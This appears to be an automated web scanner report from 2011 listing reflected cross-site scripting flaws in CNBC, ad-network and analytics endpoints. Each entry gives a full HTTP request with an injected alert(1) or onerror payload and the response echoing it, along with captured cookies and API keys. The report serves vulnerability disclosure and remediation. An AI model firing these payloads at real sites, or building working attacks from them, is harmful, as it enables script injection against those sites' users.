The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 1e863<script>alert(1)</script>03af89ea0d9 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=22577671e863<script>alert(1)</script>03af89ea0d9&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:21 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "22577671e863<script>alert(1)</script>03af89ea0d9"

   
                                                           </head>
...[SNIP]...

3.2. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 34bbc--><script>alert(1)</script>f035f2c61ed was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=151549134bbc--><script>alert(1)</script>f035f2c61ed&pid=2257767&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:19 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3548
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "151549134bbc--><script>alert(1)</script>f035f2c61ed" -->
...[SNIP]...

3.3. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 1452a--><script>alert(1)</script>8a3c8bebaae was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=2257767&ps=-11452a--><script>alert(1)</script>8a3c8bebaae&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:24 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3987
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-11452a--><script>alert(1)</script>8a3c8bebaae" -->
   
...[SNIP]...

3.4. http://ads.rnmd.net/getAds [adDiv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.rnmd.net
Path:   /getAds

Issue detail

The value of the adDiv request parameter is copied into the HTML document as plain text between tags. The payload 5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931 was submitted in the adDiv parameter. This input was echoed as 5a098<img src=a onerror=alert(1)>13fd8da2931 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /getAds?delivery=jsonp&adType=banner&adDiv=rnmdad5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931&appId=cnbc_web&t=other,OFFDECK&w=300&h=50&v=1&ck=1315339668282 HTTP/1.1
Host: ads.rnmd.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.cnbc.com/mytestc3e92%27-prompt(document.location)-%27f261e685920/ipecho.php

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:53 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
x-rnmd-pc: 208.91.189.56
Content-Type: application/x-javascript
Content-Length: 709
Set-Cookie: personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:53 GMT
Connection: close

net.rnmd.sdk._private.JsonHelper.completeRequest({"personCookie":"208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8","adDiv":"rnmdad5a098<img src=a onerror=alert(1)>13fd8da2931","htmlPayload":"<div style=\"text-align: center\">
...[SNIP]...

3.5. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-cdn.cnbc.com
Path:   /api/chart/chart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 34781<script>alert(1)</script>ee34ae3f437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/chart/chart.asp?34781<script>alert(1)</script>ee34ae3f437=1 HTTP/1.1
Host: api-cdn.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html
Cache-Control: private
Expires: Tue, 06 Sep 2011 16:25:59 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Date: Tue, 06 Sep 2011 17:05:59 GMT
Content-Length: 182
Connection: close

<pre>An Error occurred with this request.

34781<script>alert(1)</script>ee34ae3f437=1</pre>&34781<script>alert(1)</script>ee34ae3f437=1&DCLCore.InternalID=CNAPI">Test link</a><br />

3.6. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c34f5<script>alert(1)</script>a13262bf45d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.dove.us%2FProducts%2FHair%2F&callback=_ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,72|36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Tue, 06 Sep 2011 16:45:50 GMT
Content-Length: 96
Connection: close

_ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d({"shares":19});

3.7. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload e1c14<script>alert(1)</script>d994c816c62 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:13 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62)

3.8. http://api.bizographics.com/v1/profile.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e6718<script>alert(1)</script>2d7bd36d61c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 06 Sep 2011 15:33:16 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 204
Connection: keep-alive

_bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5af80<script>alert(1)</script>e6879303a2a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:50 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a)

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload db976<script>alert(1)</script>5d2b699441d was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=db976<script>alert(1)</script>5d2b699441d HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:52 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: db976<script>alert(1)</script>5d2b699441d

3.11. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/chart/chart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 90215<script>alert(1)</script>736c487a586 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/chart/chart.asp?90215<script>alert(1)</script>736c487a586=1 HTTP/1.1
Host: api.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:06:00 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 182
Expires: Tue, 06 Sep 2011 16:26:00 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<pre>An Error occurred with this request.

90215<script>alert(1)</script>736c487a586=1</pre>&90215<script>alert(1)</script>736c487a586=1&DCLCore.InternalID=CNAPI">Test link</a><br />

3.12. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/movers/movers.asp

Issue detail

The value of the chartType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f0d"><script>alert(1)</script>2d1497842a9 was submitted in the chartType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainers98f0d"><script>alert(1)</script>2d1497842a9&rowCount=3&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:57:13 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:17:13 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Market Movers</title>
   <link rel='stylesheet' ty
...[SNIP]...
<div id="module" rowCount="3" chartType="gainers98f0d"><script>alert(1)</script>2d1497842a9">
...[SNIP]...

3.13. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/movers/movers.asp

Issue detail

The value of the rowCount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 467b2"><script>alert(1)</script>23b923cf03b was submitted in the rowCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=3467b2"><script>alert(1)</script>23b923cf03b&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:57:16 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:17:15 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 53613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Market Movers</title>
   <link rel='stylesheet' ty
...[SNIP]...
<div id="module" rowCount="3467b2"><script>alert(1)</script>23b923cf03b" chartType="gainers">
...[SNIP]...

3.14. http://api.viglink.com/api/ping [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3a9ec<script>alert(1)</script>4d02caaf2cd was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=021de175e1e571c67cfaeea3c68d72e8&loc=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&v=1&jsonp=vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
Origin: http://www.readwriteweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://www.readwriteweb.com
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en-US
Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Sep 2011 15:33:39 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 160
Connection: keep-alive

vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd(1315323219590,2000,[],[],{"plugins":{},"timeClick":true,"debug":false,"timePing":false},[]);

3.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload b7be8<script>alert(1)</script>8499cdf77af was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2b7be8<script>alert(1)</script>8499cdf77af&c2=1000004&c3=&c4=&c5=&c6=&c15= HTTP/1.1
